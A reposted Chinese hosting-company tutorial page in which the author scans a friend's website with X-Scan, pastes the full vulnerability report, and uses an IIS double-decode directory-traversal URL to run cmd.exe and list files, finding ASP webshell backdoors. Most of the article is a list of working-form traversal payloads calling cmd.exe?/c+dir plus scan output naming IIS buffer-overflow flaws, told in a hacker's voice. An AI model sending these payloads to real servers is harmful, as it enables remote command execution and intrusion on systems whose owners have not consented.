电信主站 网通分站
购买流程 付款方式 常见问题 在线提问 续租服务 购物车
用户名: 密 码: 忘记密码?
首 页
域名注册
虚拟主机
双线主机
服务器租用
VPS主机
企业邮局
代理专区
客服中心
虚拟主机行业资讯 虚拟主机评测对比 互联网最新动态 技术学院 站长资讯 在线教程 网站运营
搜索优化 服务器 网络编程 图形图象 站长之家 网页制作 操作系统
冲浪宝典 软件教学 视频通信 办公软件 邮件系统 网络安全 认证考试
您当前位置:西部数码->资讯中心-> 在线教程-> ASP
利用X-Scan找ASP木马后门
作者:未知 点击:0
  西部数码-全国虚拟主机10强!20余项虚拟主机管理功能,全国领先!第6代双线路虚拟主机,南北访问畅通无阻!虚拟主机可在线rar解压,自动数据恢复设置虚拟目录等.虚拟主机免费赠送访问统计,企业邮局.Cn域名注册10元/年,自助建站480元起,免费试用7天,满意再付款!P4主机租用799元/月.月付免压金!
文章页数:[1] 
 今天无聊连家都回不去呵呵~~朋友叫测试个站

打开地址一看呆拉!!可能是他故意难我吧打开地址后就这样:

[[[正在建立您想要连接的站点目前没有默认页。可能正在被进行升级。

请稍候再试此站点。假如问题仍然存在,请与 Web 站点管理员联系。 ]]]

呵呵!!

不怕有句老话不会扫描那就不是一个真正的黑客

来该X-Scan上场
****.**.**.**

扫描结果如下:

X-Scan 检测报告
------------------

检测结果

- 存活主机 : 1
- 漏洞数量 : 22
- 警告数量 : 16
- 提示数量 : 6

主机列表

****.**.**.** (发现安全漏洞)
. OS: Windows; PORT/TCP: 21, 25, 53, 80, 443


详细资料

****.**.**.** :
. 开放端口列表 :
o smtp (25/tcp) (发现安全警告)
o domain (53/tcp) (发现安全提示)
o www (80/tcp) (发现安全漏洞)
o https (443/tcp) (发现安全提示)
o ftp (21/tcp) (发现安全提示)

. 端口"smtp (25/tcp)"发现安全警告 :

SMTP服务器不支持用户身份验证,允许匿名用户使用


. 端口"smtp (25/tcp)"发现安全提示 :


A SMTP server is running on this port
Here is its banner :
220 altsyz-web Microsoft ESMTP MAIL Service, Version: 5.0.2195.2966 ready at
Wed, 20 Oct 2004 06:28:38 +0800
NESSUS_ID : 10330

. 端口"domain (53/tcp)"发现安全提示 :


Maybe the "domain" service running on this port.

NESSUS_ID : 10330

. 端口"www (80/tcp)"发现安全漏洞 :
IIS编码/解码漏洞:
http://****.**.**.**/scripts/..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir


. 端口"www (80/tcp)"发现安全漏洞 :

IIS编码/解码漏洞:
http://****.**.**.**/scripts/..%%35c..%%35cwinnt/system32/cmd.exe?/c+di
. 端口"www (80/tcp)"发现安全漏洞 :


IIS编码/解码漏洞:
http://****.**.**.**/scripts/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir

. 端口"www (80/tcp)"发现安全漏洞 :


IIS编码/解码漏洞:
http://****.**.**.**/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir


. 端口"www (80/tcp)"发现安全漏洞 :


IIS编码/解码漏洞:
http://****.**.**.**/scripts/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir


. 端口"www (80/tcp)"发现安全漏洞 :


IIS编码/解码漏洞:
http://****.**.**.**/scripts/..%%35c..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir

. 端口"www (80/tcp)"发现安全漏洞 :


IIS编码/解码漏洞:
http://****.**.**.**/scripts/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir


. 端口"www (80/tcp)"发现安全漏洞 :


IIS编码/解码漏洞:
http://****.**.**.**/scripts/..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir

. 端口"www (80/tcp)"发现安全漏洞 :

IIS编码/解码漏洞:
http://****.**.**.**/scripts/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir

. 端口"www (80/tcp)"发现安全漏洞 :


IIS编码/解码漏洞:
http://****.**.**.**/scripts/..%%35c..%%35c..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir


. 端口"www (80/tcp)"发现安全漏洞 :

IIS编码/解码漏洞:
http://****.**.**.**/scripts/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir

. 端口"www (80/tcp)"发现安全漏洞 :


IIS编码/解码漏洞:
http://****.**.**.**/scripts/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir


. 端口"www (80/tcp)"发现安全漏洞 :


IIS编码/解码漏洞:
http://****.**.**.**/scripts/..%u00255c..%u00255cwinnt/system32/cmd.exe?/c+dir

. 端口"www (80/tcp)"发现安全漏洞 :

IIS编码/解码漏洞:
http://****.**.**.**/scripts/..%u00255c..%u00255c..%u00255c..%u00255c..%u00255cwinnt/system32/cmd.exe?/c+dir


. 端口"www (80/tcp)"发现安全漏洞 :


IIS编码/解码漏洞:

. 端口"www (80/tcp)"发现安全漏洞 :


The remote Microsoft Frontpage server seems vulnerable to a remote
buffer overflow. Exploitation of this bug could give an unauthorized
user access to the machine.

The following systems are known to be vulnerable:

Microsoft Windows 2000 Service Pack 2, Service Pack 3
Microsoft Windows XP, Microsoft Windows XP Service Pack 1
Microsoft Office XP, Microsoft Office XP Service Release 1

Solution: Install relevant service pack or hotfix from URL below.

See als
http://www.microsoft.com/technet/security/bulletin/ms03-051.mspx

Risk factor : High
CVE_ID : CAN-2003-0822, CAN-2003-0824
NESSUS_ID : 11923
Other references : IAVA:2003-A-0033



. 端口"www (80/tcp)"发现安全漏洞 :





There's a buffer overflow in the remote web server through
the ISAPI filter.

It is possible to overflow the remote web server and execute
commands as user SYSTEM.

Solution: See
http://www.microsoft.com/technet/security/bulletin/ms01-044.mspx
Risk factor : High
CVE_ID : CVE-2001-0544, CVE-2001-0545, CVE-2001-0506, CVE-2001-0507,
CVE-2001-0508, CVE-2001-0500
BUGTRAQ_ID : 2690, 3190, 3194, 3195
NESSUS_ID : 10685



. 端口"www (80/tcp)"发现安全漏洞 :





The IIS server appears to have the .HTR ISAPI filter mapped.

At least one remote vulnerability has been discovered for the .HTR
filter. This is detailed in Microsoft Advisory
MS02-018, and gives remote SYSTEM level access to the web server.

It is recommended that, even if you have patched this vulnerability,
you unmap the .HTR extension and any other unused ISAPI extensions
if they are not required for the operation of your site.

Solution :
To unmap the .HTR extension:
1.Open Internet Services Manager.
2.Right-click the Web server choose Properties from the context menu.
3.Master Properties
4.Select WWW Service -> Edit -> HomeDirectory -> Configuration
and remove the reference to .htr from the list.

In addition, you may wish to download and install URLSCAN from the
Microsoft Technet Website. URLSCAN, by default, blocks all requests
for .htr files.

Risk factor : High
CVE_ID : CVE-2002-0071
BUGTRAQ_ID : 4474
NESSUS_ID : 10932
Other references : IAVA:2002-A-0002



. 端口"www (80/tcp)"发现安全漏洞 :





The remote server is vulnerable to a buffer overflow in the .HTR
filter.

An attacker may use this flaw to execute arbitrary code on
this host (although the exploitation of this flaw is considered
as being difficult).

Solution:
To unmap the .HTR extension:
1.Open Internet Services Manager.
2.Right-click the Web server choose Properties from the context menu.
3.Master Properties
4.Select WWW Service -> Edit -> HomeDirectory -> Configuration
and remove the reference to .htr from the list.

See MS bulletin MS02-028 for a patch

Risk factor : High
CVE_ID : CVE-2002-0364, CVE-2002-0071
BUGTRAQ_ID : 4855
NESSUS_ID : 11028
Other references : IAVA:2002-A-0002



. 端口"www (80/tcp)"发现安全漏洞 :





The remote WebDAV server may be vulnerable to a buffer overflow when
it receives a too long request.

An attacker may use this flaw to execute arbitrary code within the
LocalSystem security context.

*** As safe checks are enabled, Nessus did not actually test for this
*** flaw, so this might be a false positive

Solution : See
http://www.microsoft.com/technet/security/bulletin/ms03-007.mspx
Risk Factor : High
CVE_ID : CAN-2003-0109
BUGTRAQ_ID : 7116
NESSUS_ID : 11412
Other references : IAVA:2003-A-0005



. 端口"www (80/tcp)"发现安全漏洞 :






When IIS receives a user request to run a script, it renders
the request in a decoded canonical form, then performs
security checks on the decoded request. A vulnerability
results because a second, superfluous decoding pass is
performed after the initial security checks are completed.
Thus, a specially crafted request could allow an attacker to
execute arbitrary commands on the IIS Server.

Solution: See MS advisory MS01-026(Superseded by ms01-044)
See http://www.microsoft.com/technet/security/bulletin/ms01-044.mspx

Risk factor : High
CVE_ID : CVE-2001-0507, CVE-2001-0333
BUGTRAQ_ID : 2708
NESSUS_ID : 10671



. 端口"www (80/tcp)"发现安全漏洞 :





There's a buffer overflow in the remote web server through
the ASP ISAPI filter.

It is possible to overflow the remote web server and execute
commands as user SYSTEM.

Solution: See
http://www.microsoft.com/technet/security/bulletin/ms02-018.mspx
Risk factor : High
CVE_ID : CVE-2002-0079, CVE-2002-0147, CVE-2002-0149
BUGTRAQ_ID : 4485
NESSUS_ID : 10935
Other references : IAVA:2002-A-0002



. 端口"www (80/tcp)"发现安全警告 :

. 端口"www (80/tcp)"发现安全提示 :




A web server is running on this port
NESSUS_ID : 10330



. 端口"www (80/tcp)"发现安全提示 :




The remote web server type is :

Microsoft-IIS/5.0

Solution : You can use urlscan to change reported server for IIS.
NESSUS_ID : 10107



. 端口"https (443/tcp)"发现安全提示 :




Maybe the "https" service running on this port.

NESSUS_ID : 10330



. 端口"ftp (21/tcp)"发现安全提示 :




Maybe the "ftp" service running on this port.

NESSUS_ID : 10330》》》》》》》




结果发现IIS解码漏洞



那怎么利用呢高手就不用问拉



莱鸟继续》》》

发现没http://***.**.**.**/scripts/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir

这里要申明的是我讲的是找ASP木马后门

不做其它入侵

接下来我们打开它发现什么拉..................哈哈

Directory of d:\inetpub\scripts

2004-10-20 11:18 <DIR> .
2004-10-20 11:18 <DIR> ..
2004-10-20 10:34 1,169 admin_nighter.asp
2004-10-20 10:48 29,451 nighterasp1.5.asp
2000-02-09 22:39 15,760 NSIISLOG.DLL
2004-10-20 10:33 3,224 sniao.asp
2004-10-20 09:30 23,109 start.asp
2004-10-20 11:18 49,627 sx.asp

到这里应该明白是怎么回事情了吧

路径d:\inetpub

文件路径\scripts\

admin_nighter.asp


这就是木马    
文章整理:西部数码--专业提供域名注册虚拟主机服务
http://www.west263.com
以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢!
相关主题
文章页数:[1] 
Google
热门文章
·如何使XP的目录属性出现"安全"选项-ASP教程,系统相关
·创建有个性的对话框之MFC篇(二)-ASP教程,系统相关
·用InstallShield打包ASP程序-ASP教程,ASP应用
·windows server 2003 中 SQL Server 2000 分布式事务 错误解决方法-ASP教程,系统相关
·创建有个性的对话框之MFC篇(一)-ASP教程,系统相关
·DevExpress打印相关代码-ASP教程,打印相关
·File文件控件,选中文件(图片,flash,视频)即立即预览显示-ASP教程,组件开发
·用Windows的文件映射机制,实现大批量数据的快速存储-ASP教程,系统相关
·ADO如何取得数据库中表的字段信息之一
·使用DEVEXPRESS部件打印时标题的处理-ASP教程,打印相关

最新文章
· SQL注入天书 - ASP注入漏洞全接触
·用.net 处理xmlHttp发送异步请求
·asp.net创建文件夹的IO类的问题
·如何实现ASP.NET网站个性化
·关于ASP.NET调用JavaScript的实现
·ASP利用Google实现在线翻译功能
·Asp无组件生成缩略图
·由HTTP 500 Internal server error想到的...
·实例讲解asp抓取网上房产信息
·改mdb为asp所带来的灾难


 
 


版权申明:本站文章均来自网络,如有侵权,请联系我们,我们收到后立即删除,谢谢!

特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有。
  打印  刷新  关闭
返回首页 |关于我们 | 联系我们 | 付款方式 | 创业联盟 | 虚拟主机 | 资讯中心 | 友情链接 | 网站地图

版权所有 西部数码(www.west263.com)
CopyRight (c) 2002~2006 west263.com all right reserved.
公司地址:四川成都市万和路90号天象大厦4楼 邮编:610031
电话总机:028-86262244 86263048 86263408 86263960 86264018 86267838
售前咨询:总机转201 202 203 204 206 208
售后服务:总机转211 212 213 214
财务咨询:总机转224 223 传真:028-86264041 财务QQ:点击发送消息给对方635483282
售前咨询QQ:点击发送消息给对方2182518 点击发送消息给对方241975952 点击发送消息给对方275026793 点击发送消息给对方408235859
售后服务QQ:点击发送消息给对方17708515 点击发送消息给对方307742704 点击发送消息给对方287976517 点击发送消息给对方363783715
《中华人民共和国增值电信业务经营许可证》编号:川B2-20030065号